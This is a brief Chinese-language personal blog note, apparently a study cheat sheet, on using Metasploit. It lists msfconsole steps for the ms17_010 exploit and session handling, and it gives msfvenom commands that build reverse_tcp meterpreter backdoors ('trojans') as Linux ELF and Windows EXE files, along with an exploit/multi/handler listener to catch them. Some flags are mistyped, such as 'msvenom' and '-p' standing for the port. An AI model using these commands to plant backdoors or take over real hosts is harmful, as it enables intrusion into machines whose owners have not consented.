Wray Lee
Articles35
Tags0
Categories0

Archive

msf使用

msf使用

msf使用

metasploit

流程

msfconsole

  1. search [ms17_010] 查找漏洞

  2. use [] 选择漏洞

  3. show options 查看参数

  4. session 查看会话

    session [num] 选择会话

run vnc

后门

msvenom -p [payload] lhost=[] lport=[] -f(format) exe -o(output) file_name.exe

监听

use exploit/multi/handler

攻击主机

image-20221223144819404

生成木马

linux : msvenom -p linux/x64/meterpreter/reverse_tcp lhost=[host] -p=[port] -f elf -o .elf

win: msvenom -p windows/meterpreter/reverse_tcp lhost=[host] -p=[port] -f exe -o .exe

监听木马

handler -p [] lhost=[] -p []

use exploit/multi/handler

set

run

Author:Wray Lee
Link:http://blog.wray7.top/2023/09/04/Network/Safety/msf%E4%BD%BF%E7%94%A8/
版权声明:本文采用 CC BY-NC-SA 3.0 CN 协议进行许可